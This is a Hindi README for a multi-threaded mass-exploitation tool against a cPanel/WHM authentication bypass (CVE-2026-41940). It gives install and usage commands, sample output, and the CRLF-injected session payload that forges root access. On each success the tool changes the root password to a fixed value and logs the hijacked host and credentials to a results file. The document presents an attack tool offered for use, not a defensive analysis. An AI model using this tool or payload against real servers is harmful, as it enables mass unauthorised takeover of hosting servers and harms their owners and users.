
cPanel/WHM पर CVE-2026-41940 के लिए बल्क स्कैनर और सामूहिक शोषण उपकरण, स्वचालित लक्ष्य सत्यापन और उच्च-गति मल्टी-थ्रेडेड निष्पादन के लिए निर्मित।
CVE-2026-41940 WHM/cPanel में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो हमलावरों को वैध क्रेडेंशियल के बिना प्रमाणीकरण को बायपास करने और सर्वर पर रूट एक्सेस प्राप्त करने की अनुमति देती है। यह भेद्यता सत्र प्रबंधन तंत्र में CRLF इंजेक्शन का लाभ उठाकर दुर्भावनापूर्ण सत्र पैरामीटर इंजेक्ट करती है।
यह टूल एक साथ कई लक्ष्यों के परीक्षण के लिए मल्टी-थ्रेडिंग समर्थन के साथ मास एक्सप्लॉइटेशन क्षमताएँ प्रदान करता है, जिसमें बुद्धिमान सफलता पहचान और अमान्य लक्ष्यों की स्वचालित फ़िल्टरिंग शामिल है।
| विशेषता | विवरण |
|---|---|
| ✅ मास एक्सप्लॉइटेशन | सूची फ़ाइल से कई लक्ष्यों को स्कैन और एक्सप्लॉइट करें |
| 🚀 मल्टी-थ्रेडिंग | तेज़ स्कैनिंग के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या (डिफ़ॉल्ट: 15) |
| 🔐 स्वचालित पासवर्ड परिवर्तन | सफल एक्सप्लॉइट पर रूट पासवर्ड को Jenderal92 में बदलता है |
| 🛡️ स्मार्ट सफलता पहचान | विभिन्न WHM API प्रतिक्रिया प्रारूपों का स्वचालित रूप से पता लगाता है |
| ⚠️ लाइसेंस त्रुटि फ़िल्टरिंग | अमान्य/लाइसेंस नहीं पढ़ सकता त्रुटियों वाले लक्ष्यों को बाहर करता है |
| 📝 संरचित आउटपुट | केवल पुष्टि किए गए सफल परिणामों को `domain:port |
| 🛡️ SSL/TLS समर्थन | स्व-हस्ताक्षरित प्रमाणपत्रों को स्वचालित रूप से संभालता है |
| 🔄 सत्र प्रबंधन | स्वचालित सत्र निष्कर्षण, कुकी इंजेक्शन और टोकन हैंडलिंग |
| ⏱️ टाइमआउट नियंत्रण | कॉन्फ़िगर करने योग्य कनेक्शन टाइमआउट (डिफ़ॉल्ट: 15 सेकंड) |
| 🔍 पूर्व-कनेक्शन जाँच | एक्सप्लॉइटेशन प्रयास से पहले पोर्ट उपलब्धता सत्यापित करता है |
| 📊 रीयल-टाइम प्रगति | प्रत्येक एक्सप्लॉइटेशन चरण के लिए विस्तृत प्रगति दिखाता है |
pip install requests urllib3 futures
या requirements.txt का उपयोग करें:
requests==2.27.1
urllib3==1.26.18
futures==3.4.0
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py
targets.txt फ़ाइल बनाएँ जिसमें प्रत्येक पंक्ति में एक लक्ष्य हो:
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com
नोट: पोर्ट
2087डिफ़ॉल्ट WHM पोर्ट है। यदि निर्दिष्ट नहीं है, तो यह स्वचालित रूप से पोर्ट 2087 का उपयोग करेगा। यदि HTTP/HTTPS उपसर्ग गायब है तो इसे स्वचालित रूप से जोड़ा जाएगा।
python2 CVE-2026-41940.py targets.txt
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5
# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30
| तर्क | विवरण | डिफ़ॉल्ट | आवश्यक |
|---|---|---|---|
list_file | लक्ष्य सूची वाली फ़ाइल (प्रति पंक्ति एक) | - | ✅ हाँ |
--threads | समवर्ती थ्रेड की संख्या | 15 | ❌ नहीं |
--hostname | सभी लक्ष्यों के लिए Host हेडर ओवरराइड करें | स्वतः पता लगाना | ❌ नहीं |
--timeout | सेकंड में कनेक्शन टाइमआउट | 15 | ❌ नहीं |
res.txt)केवल पुष्टि किए गए सफल एक्सप्लॉइट सहेजे जाते हैं। लाइसेंस त्रुटियों, असफल पासवर्ड परिवर्तन या कनेक्शन समस्याओं वाले लक्ष्य स्वचालित रूप से बाहर कर दिए जाते हैं।
प्रारूप:
domain:port|root|Jenderal92
उदाहरण आउटपुट:
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92
निम्नलिखित लक्ष्य res.txt में नहीं सहेजे जाएँगे:
Cannot Read License File)$ python2 CVE-2026-41940.py targets.txt --threads 10
CVE-2026-41940 bypass authentication - Mass Exploit
[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED
==================================================
[*] Checking target: 127.0.0.1
Original input: 127.0.0.1
Normalized: https://127.0.0.1:2087
Port 2087: OPEN
Testing connection... OK (HTTP 200)
[0] hostname = example.com
[1] minting a preauth session...
session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.118.0.13"}
[*] attempting to change the root password
passwd -> HTTP 200
{
"data": {
"app": ["system"]
},
"metadata": {
"output": {
"raw": "Password for \"root\" has been changed."
},
"reason": "Password changed for user \"root\".",
"version": 1,
"command": "passwd",
"result": 1
}
}
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!
[✓] SUCCESS & SAVED: 127.0.0.1:2087
Saved to res.txt: 127.0.0.1:2087|root|Jenderal92
==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4
[+] Results saved to res.txt
Successfully exploited targets (password changed to Jenderal92):
✓ 127.0.0.1:2087
एक्सप्लॉइट में बुद्धिमान सत्यापन के साथ 4 मुख्य चरण शामिल हैं:
[1] minting a preauth session...
/login/?login_only=1 पर POST अनुरोध भेजता हैwhostmgrsession कुकी प्राप्त करता है,<obhex> भाग को हटाकर सत्र आधार निकालता है[2] sending the CRLF injection...
Authorization: Basic हेडर के साथ GET अनुरोध भेजता हैroot:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
\r\n) वर्ण नकली सत्र पैरामीटर इंजेक्ट करते हैंcp_security_token युक्त Location हेडर के साथ प्रतिक्रिया करता है[3] firing do_token_denied to propagate...
/scripts2/listaccts एंडपॉइंट तक पहुंचता हैdo_token_denied तंत्र को ट्रिगर करता है